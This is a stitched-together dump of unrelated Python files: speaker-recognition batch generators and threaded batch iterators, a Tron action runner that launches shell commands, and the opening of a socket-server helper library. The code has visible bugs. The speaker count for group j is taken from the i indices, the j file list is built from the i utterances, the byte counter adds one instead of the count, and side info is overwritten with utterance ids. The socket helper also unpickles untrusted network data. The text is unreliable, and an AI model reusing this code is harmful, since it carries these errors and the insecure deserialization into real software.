files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
utts_j = groups_u[j_ind[ b ]][0]
files_j = [utt2file[u] for u in utts_j ]
data_j = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_j)
if ( output_utt_id ):
data_j.append(utts_j)
n_spk_i = len( np.unique( groups_s[ i_ind[b] ] )) # Number of speaker in i
n_spk_j = len( np.unique(groups_s[ i_ind[b] ] )) # Number of speaker in the j
n_utt_i = len( groups_u[ i_ind[b] ][0] ) # Number of utterances in i
n_utt_j = len( groups_u[ j_ind[b] ][0] ) # Number of utterances in j
data = [data_i, data_j]
if (verbose):
print("i " + str(i_ind[b]) + ", j = " + str(j_ind[b]))
print(" n_spk_i: " + str(n_spk_i) + " n_utt_i " + str(n_utt_i))
print(" n_spk_j: " + str(n_spk_j) + " n_utt_j " + str(n_utt_j))
print(" Speakers i: " + str( groups_s[ i_ind[b] ] ))
print(" Speakers j: " + str( groups_s[ j_ind[b] ] ))
print(" Utterances i: " + str( groups_u[ i_ind[b] ] ))
print(" Utterances j: " + str( groups_u[ j_ind[b] ] ))
b += 1
if b == len(i_ind):
new_epoch = True
elif(batch_selection == "random"):
# In this case, we usually have to load both the "i" and
# "j" data.
if (i_ind[ b ] == j_ind[ b ]):
utts_i = groups_u[i_ind[ b ]][0]
files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
utts_j = utts_i
data_j = data_i
else:
utts_i = groups_u[i_ind[ b ]][0]
files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
utts_j = groups_u[i_ind[ b ]][0]
files_j = [utt2file[u] for u in utts_i ]
data_j = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_j)
if ( output_utt_id ):
data_j.append(utts_j)
n_spk_i = len( np.unique( groups_s[ i_ind[b] ] )) # Number of speaker in i
n_spk_j = len( np.unique(groups_s[ i_ind[b] ] )) # Number of speaker in the j
n_utt_i = len( groups_u[ i_ind[b] ][0] ) # Number of utterances in i
n_utt_j = len( groups_u[ j_ind[b] ][0] ) # Number of utterances in j
data = [data_i, data_j]
if (verbose):
print("i " + str(i_ind[b]) + ", j = " + str(j_ind[b]))
print(" n_spk_i: " + str(n_spk_i) + " n_utt_i " + str(n_utt_i))
print(" n_spk_j: " + str(n_spk_j) + " n_utt_j " + str(n_utt_j))
print(" Speakers i: " + str( groups_s[ i_ind[b] ] ))
print(" Speakers j: " + str( groups_s[ j_ind[b] ] ))
print(" Utterances i: " + str( groups_u[ i_ind[b] ] ))
print(" Utterances j: " + str( groups_u[ j_ind[b] ] ))
b += 1 # Increase the batch index
if b == len(i_ind):
new_epoch = True
# Print some info about the batch
if (verbose):
out_data_size = asizeof(data)
if (out_data_size > 1073741824):
print(" The batch size is %0.2f GB" % ( out_data_size / 1073741824.0 ))
elif (out_data_size > 1048576):
print(" The batch size is %0.2f MB" % ( out_data_size / 1048576.0 ))
elif (out_data_size > 1024):
print(" The batch size is %0.2f KB" % ( out_data_size / 1024.0 ))
else:
print(" The batch size is %0.2f B" % ( out_data_size ))
print(" Time taken to prepare batch: " + str( time.time() - start_time ) + "s")
print(" Done preparing batch at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print("***")
yield data
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
def gen_mbatch_spk_bal(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False,
arrange_spk_fcn = None, n_spk_per_batch=50, n_utt_per_spk=2,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random, out2put_utt2sideInfo=False ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
if out2put_utt2sideInfo:
utt2sideInfo = scp_info[ 'utt2sideInfo' ]
n_spk = len(spk_name)
# Randomize the speakers
spk_arr = []
# This list has one entry per speaker which keeps a list of the speakers utterances
spk2utt_fixed = [np.where(utt2spk ==i)[0] for i in range(n_spk)]
# As above but the speakers' utterance lists are randomized and gradually poped when
# batches are created. Whenever a list becomes empty, a new is created randomly.
spk2utt_rand = [ spk2utt_fixed[i][ rng.permutation(len(spk2utt_fixed[i])) ] for i in range(n_spk) ]
while True:
if len(spk_arr) < n_spk_per_batch:
spk_arr = spk_arr + list(rng.permutation( n_spk ))
spk_this_batch = spk_arr[0:n_spk_per_batch]
del spk_arr[0:n_spk_per_batch]
utts = np.array([], dtype=int)
for i in range( len(spk_this_batch) ):
ii = spk_this_batch[i]
if ( len( spk2utt_rand[ii] ) < n_utt_per_spk ):
spk2utt_rand[ii] = np.concatenate( [spk2utt_rand[ii], spk2utt_fixed[ii][ rng.permutation(len(spk2utt_fixed[ii])) ] ] )
utts = np.concatenate((utts, spk2utt_rand[ii][0:n_utt_per_spk]))
spk2utt_rand[ii] = np.delete( spk2utt_rand[ii], np.arange(0, n_utt_per_spk) )
files = [utt2file[u] for u in utts ]
###
#data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
# max_length, frame_step, output_labs, output_scp_ind, utts)
data = [[]]
if (output_labs):
data.append(utt2spk[utts])
# Append the scp indices for the selected utterances if wanted.
# (Can be used for e.g. looking up trial weigts or
# for obtaining e.g., i-vectors or 0th stats if these
# are alreade stored on the GPU)
if (output_scp_ind):
batch_scp_ind = [utt2scpInd[u] for u in utts]
data.append( batch_scp_ind )
if ( output_utt_id ):
data.append(utts)
if ( out2put_utt2sideInfo ):
sideInfo = [ utt2sideInfo[u] for u in utts ]
data.append( sideInfo )
yield data
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
def gen_mbatch_spk_bal_semi(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False,
arrange_spk_fcn = None, n_spk_per_batch=50, n_utt_per_spk=2,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random, out2put_utt2sideInfo=False, n_unk_per_batch=50 ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
if out2put_utt2sideInfo:
utt2sideInfo = scp_info[ 'utt2sideInfo' ]
# Make one spk name is "unk"
assert ( np.asarray( spk_name == "unk" ).nonzero()[0][0] )
unk_spk_id = np.asarray( spk_name == "unk" ).nonzero()[0][0]
# A list of the speaker IDs that are not "unk"
spk_fixed = list(range( len(spk_name)))
del spk_fixed[unk_spk_id]
n_spk = len(spk_name) -1
# For now we assert unk is the lst ID. Otherwise we need to update the returned labels. The train script assumes the last ID is unk.
assert (unk_spk_id == n_spk)
# Randomize the speakers
spk_arr = []
# This list has one entry per speaker which keeps a list of the speakers utterances
spk2utt_fixed = [np.where(utt2spk ==i )[0] for i in spk_fixed]
log.info("Number of speakers: %d", len(spk2utt_fixed))
n_sup_utt = sum([len(spk2utt_fixed[i]) for i in range(n_spk) ])
log.info("Number of utterances with speaker ID: %d", n_sup_utt)
# As above but the speakers' utterance lists are randomized and gradually poped when
# batches are created. Whenever a list becomes empty, a new is created randomly.
spk2utt_rand = [ spk2utt_fixed[i][ rng.permutation(len(spk2utt_fixed[i])) ] for i in range(n_spk) ]
unk2utt_fixed = np.where( utt2spk ==1000 )[0]
unk2utt_rand = np.random.permutation( unk2utt_fixed )
log.info("Number of utterances with unknown speakers: %d", unk2utt_fixed.shape[0])
while True:
# This part is for the supervised data
if len(spk_arr) < n_spk_per_batch:
spk_arr = spk_arr + list(rng.permutation( n_spk ))
spk_this_batch = spk_arr[0:n_spk_per_batch]
del spk_arr[0:n_spk_per_batch]
utts = np.array([], dtype=int)
for i in range( len(spk_this_batch) ):
ii = spk_this_batch[i]
if ( len( spk2utt_rand[ii] ) < n_utt_per_spk ):
spk2utt_rand[ii] = np.concatenate( [spk2utt_rand[ii], spk2utt_fixed[ii][ rng.permutation(len(spk2utt_fixed[ii])) ] ] )
utts = np.concatenate((utts, spk2utt_rand[ii][0:n_utt_per_spk]))
spk2utt_rand[ii] = np.delete( spk2utt_rand[ii], np.arange(0, n_utt_per_spk) )
# This part is for the unsupervised data
if ( len( unk2utt_rand ) < n_unk_per_batch ):
unk2utt_rand = np.concatenate( [unk2utt_rand, unk2utt_fixed[ rng.permutation(len(unk2utt_fixed)) ] ] )
utts = np.concatenate((utts, unk2utt_rand[0:n_unk_per_batch]))
unk2utt_rand = np.delete( unk2utt_rand, np.arange(0, n_unk_per_batch) )
files = [utt2file[u] for u in utts ]
###
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
if ( out2put_utt2sideInfo ):
sideInfo = [ utt2sideInfo[u] for u in utts ]
data.append( sideInfo )
yield data
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator(object):
def __init__(self, it_tr, train_scp_info, load_feats_train, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it_tr = it_tr
self.train_scp_info = train_scp_info
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.load_feats_train = load_feats_train
self.annoying_train = annoying_train
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
self.batch_thread.daemon = True # This will make the process die if the main process dies I THINK...???
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
# [X, Y, U] = self.it_tr.next()
BB = next(self.it_tr)
if len(BB)==3:
[X, Y, U] = BB
elif len(BB)==4 :
[X, Y, U, S] = BB
else:
log.error("ERROR: Wrong output from iterator")
if isinstance(U, list):
control_nb = U[0][0]
else:
control_nb = U[0]
if self.use_mpi:
# Divede utterances of the batch. Which one this worker will
# process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
S = U[start:end]
else:
start = 0
end = len(Y)
tr_files = [ self.train_scp_info['utt2file'][u] for u in U]
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats_train( tr_files )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_tr_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
log.info( tr_files[bu] )
bad_tr_files.append(tr_files[bu])
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
# Note of-course, we don't need to remove anything from the tr_feats and tr_feats_o, since
# obviously no features have been added for the uttereances where there were no features :)
self.batch_number += 1
#batch = [[X,Y,U], bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats_train( tr_files )
bad_tr_files = []
tr_idx = None
#batch = [[X,Y,U], bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
# As above but takes a list of iterators and and scp info corresponding to different sets.
# Each set will be used once per batch
class batch_iterator_multi_set(object):
def __init__(self, it, scp_info, load_feats, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it = it
self.scp_info = scp_info
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.load_feats = load_feats
self.annoying_train = annoying_train
self.n_sets = len(self.it)
assert len(self.it) == len(self.scp_info)
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
self.batch_thread.daemon = True # This will make the process die if the main process dies I THINK...???
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
X = []
Y = []
U = []
S = []
for it in self.it:
#[x, y, u] = it.next()
B = next(it)
if len(B) ==3:
X.append(B[0])
Y.append(B[1])
U.append(B[2])
elif len(B) ==4:
X.append(B[0])
Y.append(B[1])
U.append(B[2])
S.append(B[3])
else:
log.error("ERROR: Wrong output from iterator")
if (len(S)>0):
BB = [X,Y,U,S]
else:
BB = [X,Y,U]
control_nb = U[0][0]
if self.use_mpi:
log.error("Multi set training not supported with MPI training.")
"""
# Divede utterances of the batch. Which one this worker will
# process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
"""
else:
start = 0
#end = len(Y)
end = len(Y[0])
#tr_files = [ self.train_scp_info['utt2file'][u] for u in U]
files = []
for i in range(self.n_sets):
files += [ self.scp_info[i]['utt2file'][u] for u in U[i]]
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats( files )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
log.info( files[bu] )
bad_files.append(files[bu])
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
# Note of-course, we don't need to remove anything from the tr_feats and tr_feats_o, since
# obviously no features have been added for the uttereances where there were no features :)
self.batch_number += 1
batch = [BB, bad_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats( files )
bad_files = []
tr_idx = None
batch = [BB, bad_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X[0][0:3] =" + str(X[0][0:3]) + ", Y[0][0:3] =" + str(Y[0][0:3]) + ", U[0][0:3] =" + str(U[0][0:3]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
####
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator_2(object):
def __init__(self, it_tr, load_feats, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it_tr = it_tr
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.annoying_train = annoying_train
self.load_feats = load_feats
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
self.batch_thread.daemon = True # This will make the process die if the main process dies I THINK...???
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
# [X, Y, U] = self.it_tr.next()
BB = next(self.it_tr)
if len(BB)==3:
[X, Y, U] = BB
elif len(BB)==4 :
[X, Y, U, S] = BB
else:
log.error("ERROR: Wrong output from iterator")
if isinstance(U, list):
control_nb = U[0][0]
else:
control_nb = U[0]
if self.use_mpi:
# Divede utterances of the batch. Which one this worker will
# process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
S = U[start:end]
else:
start = 0
end = len(Y)
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats( U )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_tr_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
#log.info( tr_files[bu] )
#bad_tr_files.append(tr_files[bu])
log.info( bu )
bad_tr_files.append( bu )
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
# Note of-course, we don't need to remove anything from the tr_feats and tr_feats_o, since
# obviously no features have been added for the uttereances where there were no features :)
self.batch_number += 1
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats( U )
bad_tr_files = []
tr_idx = None
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
|
action_runner.py
|
#!/usr/bin/env python3.6
"""
Write pid and stdout/stderr to a standard location before execing a command.
"""
import argparse
import contextlib
import logging
import os
import subprocess
import sys
import threading
import time
from tron import yaml
STATUS_FILE = "status"
class StatusFile:
"""Manage a status file."""
def __init__(self, filename):
self.filename = filename
def get_content(self, run_id, command, proc):
return {
"run_id": run_id,
"command": command,
"pid": proc.pid,
"return_code": proc.returncode,
"runner_pid": os.getpid(),
"timestamp": time.time(),
}
@contextlib.contextmanager
def wrap(self, command, run_id, proc):
with open(self.filename, "w") as fh:
yaml.safe_dump(
self.get_content(run_id=run_id, command=command, proc=proc,), fh, explicit_start=True, width=1000000,
)
try:
yield
finally:
with open(self.filename, "a") as fh:
yaml.safe_dump(
self.get_content(run_id=run_id, command=command, proc=proc,),
fh,
explicit_start=True,
width=1000000,
)
def validate_output_dir(path):
if os.path.isdir(path):
if not os.access(path, os.W_OK):
raise OSError("Output dir %s not writable" % path)
return
else:
try:
os.makedirs(path)
except OSError:
raise OSError("Could not create output dir %s" % path)
def build_environment(run_id, original_env=None):
if original_env is None:
original_env = dict(os.environ)
try:
namespace, job, run_num, action = run_id.split(".", maxsplit=3)
except ValueError:
# if we can't parse the run_id, we don't want to abort, so just
# set these semi-arbitrarily
namespace, job, run_num, action = ["UNKNOWN"] * 4
new_env = dict(original_env)
new_env["TRON_JOB_NAMESPACE"] = namespace
new_env["TRON_JOB_NAME"] = job
new_env["TRON_RUN_NUM"] = run_num
new_env["TRON_ACTION"] = action
logging.debug(new_env)
return new_env
def run_proc(output_path, command, run_id, proc):
logging.warning(f"{run_id} running as pid {proc.pid}")
status_file = StatusFile(os.path.join(output_path, STATUS_FILE))
with status_file.wrap(
command=command, run_id=run_id, proc=proc,
):
returncode = proc.wait()
logging.warning(f"pid {proc.pid} exited with returncode {returncode}")
return returncode
def parse_args():
parser = argparse.ArgumentParser(description="Action Runner for Tron")
parser.add_argument(
"output_dir", help="The directory to store the state of the action run",
)
parser.add_argument(
"command", help="the command to run",
)
parser.add_argument(
"run_id", help="run_id of the action",
)
return parser.parse_args()
def run_command(command, run_id):
return subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=build_environment(run_id=run_id),
)
def stream(source, dst):
is_connected = True
logging.warning(f"streaming {source.name} to {dst.name}")
for line in iter(source.readline, b""):
if is_connected:
try:
dst.write(line.decode("utf-8"))
dst.flush()
logging.warning(f"{dst.name}: {line}")
except Exception as e:
logging.warning(f"failed writing to {dst}: {e}")
logging.warning(f"{dst.name}: {line}")
is_connected = False
else:
logging.warning(f"{dst.name}: {line}")
is_connected = False
def configure_logging(run_id, output_dir):
output_file = os.path.join(output_dir, f"{run_id}-{os.getpid()}.log")
logging.basicConfig(
filename=output_file, format="%(asctime)s %(levelname)s %(message)s", datefmt="%Y-%m-%dT%H:%M:%S%z",
)
def main():
args = parse_args()
validate_output_dir(args.output_dir)
configure_logging(run_id=args.run_id, output_dir=args.output_dir)
proc = run_command(command=args.command, run_id=args.run_id)
threads = [
threading.Thread(target=stream, args=p, daemon=True)
for p in [(proc.stdout, sys.stdout), (proc.stderr, sys.stderr)]
]
for t in threads:
t.start()
returncode = run_proc(output_path=args.output_dir, run_id=args.run_id, command=args.command, proc=proc,)
for t in threads:
t.join()
return returncode
if __name__ == "__main__":
sys.exit(main())
|
__init__.py
|
import struct, socket, threading, json, os, pickle
from essentials import tokening
import essentials
import copy
import time
from hashlib import sha1
import base64
import array
PYTHONIC = "python based"
WEB_BASED = "web based"
def SocketDownload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
payload_size = struct.calcsize(">L")
while len(data) < payload_size:
data += sock.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(data) < msg_size:
data += sock.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
usage.add(len(frame_data))
try:
xData = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
return xData, data
except:
print("EOF Error Caught.")
except:
raise ConnectionError("Connection Error")
def SocketUpload(sock, data):
"""
Helper function for Socket Classes
"""
try:
data = pickle.dumps(data, 0)
size = len(data)
sock.sendall(struct.pack(">L", size) + data)
except:
raise ConnectionError("Connection Error")
def SocketUpload_WebBased(sock, data):
"""
Helper function for Socket Classes
"""
try:
if type(data) != type(b""):
print("WARNING: Web Sockets allow byte like data. Make sure your data is encoded next time.")
data.encode()
resp = bytearray([0b10000001, len(data)])
for d in bytearray(data):
resp.append(d)
sock.send(resp)
except Exception as e:
raise ConnectionError("Connection Error: " + str(e))
def HostServer(HOST, PORT, connections=5, SO_REUSEADDR=True):
"""
Helper function for Socket Classes
"""
PORT = int(os.getenv('PORT', PORT))
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
if SO_REUSEADDR == True:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST,PORT))
sock.listen(connections)
return sock
def ConnectorSocket(HOST, PORT):
"""
Helper function for Socket Classes
"""
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect((HOST, PORT))
return clientsocket
def WebSocket_Decode_Message(data):
"""
Helper function for Socket Classes
"""
data = bytearray(data)
if(len(data) < 6):
raise Exception("Error reading data")
assert(0x1 == (0xFF & data[0]) >> 7)
assert(0x1 == (0xF & data[0]))
assert(0x1 == (0xFF & data[1]) >> 7)
datalen = (0x7F & data[1])
if(datalen > 0):
mask_key = data[2:6]
masked_data = data[6:(6+datalen)]
unmasked_data = [masked_data[i] ^ mask_key[i%4] for i in range(len(masked_data))]
resp_data = bytearray(unmasked_data).decode("utf-8")
else:
resp_data = ""
return resp_data
class Transfer_Record(object):
def __init__(self):
self.sent = Data_Storage()
self.recieved = Data_Storage()
class Data_Storage(object):
def __init__(self):
self.bytes = 0
self.commits = 0
def add(self, count, type="b"):
self.bytes += 1
self.commits += 1
@property
def megabytes(self):
return self.bytes * 0.000001
@property
def gigabyte(self):
return self.megabytes * 0.001
class Socket_Server_Host:
def __init__(self, HOST, PORT, on_connection_open, on_data_recv, on_question, on_connection_close=False, daemon=True, autorun=True, connections=5, SO_REUSEADDR=True, heart_beats=True, heart_beat_wait=20):
"""Host your own Socket server to allows connections to this computer.
Parameters
----------
HOST (:obj:`str`): Your hosting IP Address for this server.
PORT (:obj:`int`): Which port you'd like to host this server on.
on_connection_open (:obj:`def`): The function to call when you get a new connection. Gives Socket_Server_Client Class
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive a question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
daemon (:obj:`bool`, optional): If you'd like the server to close when the python file closes or is interrupted.
autorun (:obj:`bool`, optional): Will run the server on init.
connections (:obj:`int`, optional): How many connections to allow at one time. To be used with autorun = True
Attributes
----------
running (:obj:`bool`): Is the server still running.
connections (:obj:`dict`): Holds all connection threads.
on_connection_open (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
on_connection_close (:obj:`def`): Holds the function you specified to use, can be over written. NOTE: Overwriting this will not overwrite old connection values.
